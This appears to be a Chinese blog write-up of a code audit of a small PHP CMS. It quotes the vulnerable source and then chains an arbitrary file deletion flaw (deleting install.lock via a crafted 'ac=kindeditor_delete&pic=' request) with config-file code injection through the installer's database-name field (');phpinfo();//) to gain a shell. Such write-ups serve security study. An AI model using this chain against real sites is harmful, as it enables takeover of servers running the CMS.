0×00:前言
记录一次小型cms代码审计
0×01:任意文件删除
因为代码繁杂,不再一展示
/app/controller/kindeditor.class.php
关键漏洞代码
- public function delete() {
- $path = ROOT_PATH.$_GET['pic'];
- unlink($path);
- $flash = M("flash");
- $row = $flash->query("delete from tc_flash where
- photo='".$_GET['pic']."'");
- echo '删除成功';
- }
- }
直接调用删除方法可以得到图片参数就可以任意任意文件
0×02:获取shell
/安装/index.php
- case '4':
- if (intval($_GET['install'])) {
- $n = intval($_GET['n']);
- $arr = array();
- $dbHost = trim($_POST['dbhost']);
- $dbPort = trim($_POST['dbport']);
- $dbName = trim($_POST['dbname']);
- $dbHost = empty($dbPort) || $dbPort == 3306 ? $dbHost : $dbHost .
- ':' . $dbPort;
- $dbUser = trim($_POST['dbuser']);
- $dbPwd = trim($_POST['dbpw']);
- $dbPrefix = empty($_POST['dbprefix']) ? 'tc_' :
- trim($_POST['dbprefix']);
- $uname = trim($_POST['manager_email']);
- $password = trim($_POST['manager_pwd']);
- $webpath = trim($_POST['webpath']);
- ......
- ......
- if ($i == 999999) exit;
- $message = '成功添加站点信息<br />成功写入配置文件<br>安装完成.';
- //
- $newmodelstr = "<?php \n";
- $newmodelstr .= " define('DBHOST', '" . $dbHost . "');\n ";
- $newmodelstr .= "define('DBUSER', '" . $dbUser . "');\n ";
- $newmodelstr .= "define('DBPWD', '" . $dbPwd . "');\n ";
- $newmodelstr .= "define('DBNAME', '" . $dbName . "');\n ";
- $newmodelstr .= "define('DBCODE', 'utf8');\n ";
- $newmodelstr .= "define('DBCONN', " . $db_pconnect . ");\n ";
- $newmodelstr .= "define('MORESITE', false);\n ";
- $newmodelstr .= "define('USEMC', false);\n ";
- $newmodelstr .= "define('MCHOST', '127.0.0.1');\n ";
- $newmodelstr .= "define('MCPORT','11211');\n ";
- $newmodelstr .= "define('MCHOST2', '127.0.0.1');\n ";
- $newmodelstr .= "define('MCPORT2','11211');\n ";
- $newmodelstr .= "\n?>\n";
- $targetFile = '../app/data/mysql.php';
- @file_put_contents($targetFile, $newmodelstr);
- $arr = array('n' => 999999, 'msg' => $message);
- die(json_encode($arr));
- }
- include_once ("./templates/s4.php");
- exit;
在安装cms的时候在$dbName可以写入一句木马进行getshell
当然当你访问网站的时候已经是安装好了的
这时候需要上一个任意文件删除的漏洞删除/app/data/install.lock文件进行系统重装
0×03:如何调用
/***cms/core/controller.class.php
控制器代码
- public function Run() {
- $this->Analysis ();
- $this->control = $_GET ['c'];
- $this->action = $_GET ['a'];
- if ($_GET ['a'] === "list") {
- $this->action = "listAll";
- }
- $groupDir = GROUP_DIR;
- $controlFile = ROOT_PATH . '/' . APP_PATH . "/" . GROUP_DIR . "/" .
- $this->control . '.class.php';
- if (! file_exists ( $controlFile )) {
- $this->setValue ( "error", $this->control . Config::lang (
- "CONTROLLERNOTEXISTS" ) );
- $this->forward ( "error.html" );
- exit ();
- }
- include ($controlFile);
- if (! class_exists ( $this->control )) {
- $this->setValue ( "error", $this->control . Config::lang (
- "CONTROLLERNOTDEFINED" ) );
- $this->forward ( "error.html" );
- exit ();
- }
- if (! empty ( $_REQUEST ['token'] ) && ! in_array ( $_REQUEST ['ac'],
- array ('user_login', 'user_reg', 'user_regOrLoginProtocol', 'user_findPwd',
- 'user_getCode' ) )) {
- $this->pubCheck ();
- }
- $instance = new $this->control ();
- $methodName = $this->action;
- $instance->$methodName ();
- $this->forceAttack();
跟进$this->Analysis();方法
- protected function Analysis() {
- $ac = array ();
- $acStr = $_GET ['ac'];
- if (empty ( $acStr )) { // 无ac参数
- $ac [0] = $this->control;
- $ac [1] = $this->action;
- } else if (! strpos ( $acStr, '_' ) && $acStr) { // ac=list
- $ac [0] = $acStr; // empty($this->control) ?
- self::getDefaultAction() : $this->control;//NULL
- $ac [1] = self::getDefaultAction ();
- $modelClass = $ac [1];
- $controlClass = $ac [0];
- } else { // ac=news_list 支持下划线的控制器
- $acAry = explode ( "_", $acStr );
- if (count ( $acAry ) == 2) {
- $modelClass = $acAry [1];
- $controlClass = $acAry [0];
- }
- if (count ( $acAry ) == 3) {
- $modelClass = $acAry [2];
- $controlClass = $acAry [0] . '_' . $acAry [1];
- }
- }
- if ($this->c ['URL_MODE'] == 1) {
- $this->control = ! empty ( $controlClass ) ? trim ( $controlClass )
- : $this->control;
- $this->action = ! empty ( $modelClass ) ? trim ( $modelClass ) :
- $this->action;
- } else if ($this->c ['URL_MODE'] == 2) {
- if (isset ( $_SERVER ['PATH_INFO'] )) {
- $path = trim ( $_SERVER ['PATH_INFO'], '/' );
- $paths = explode ( '/', $path );
- // index.php/news/show/id/275
- $this->control = array_shift ( $paths ); // news
- $this->action = array_shift ( $paths ); // show
- ParseUrl (); // news/show/id/275 index.php后面的
- }
- } else if ($this->c ['URL_MODE'] == 3) {
- // $_SERVER["QUERY_STRING"]=>
- // string(19) "ac=news_show&id=275"
- // $_SERVER["REQUEST_URI"]=>
- // string(30) "/index.php?ac=news_show&id=275"
- // bencandy.php?fid-{$fid}-id-{$id}-page-{$page}.html
- $path = str_replace ( ".asp", "", $_SERVER ["QUERY_STRING"] ); //
- news-show-1
- $paths = explode ( '-', $path );
- $this->control = array_shift ( $paths ); // news
- $this->action = array_shift ( $paths ); // show
- $key = $this->action == 'show' ? 'id' : 'page';
- $_GET [$key] = array_shift ( $paths ); // id page classidss
- }
- $_GET ['c'] = ! empty ( $this->control ) ? $this->control : 'index';
- $_GET ['a'] = ! empty ( $this->action ) ? $this->action :
- self::getDefaultAction ();
- $ac [0] = $_GET ['c'];
- $ac [1] = $_GET ['a'];
http://url/index.php?ac=控制器_方法名进行访问
构造payload ac=kindeditor_delete&pic=/app/data/install.lock
删除成功进入到安装界面
数据库名称处输入');phpinfo();//
再次访问/***cms/index.php 成功输出
0×04:总结
代码审计跟踪就对了 知识点的综合利用很重要。继续审计 上面漏洞挺多的。 |
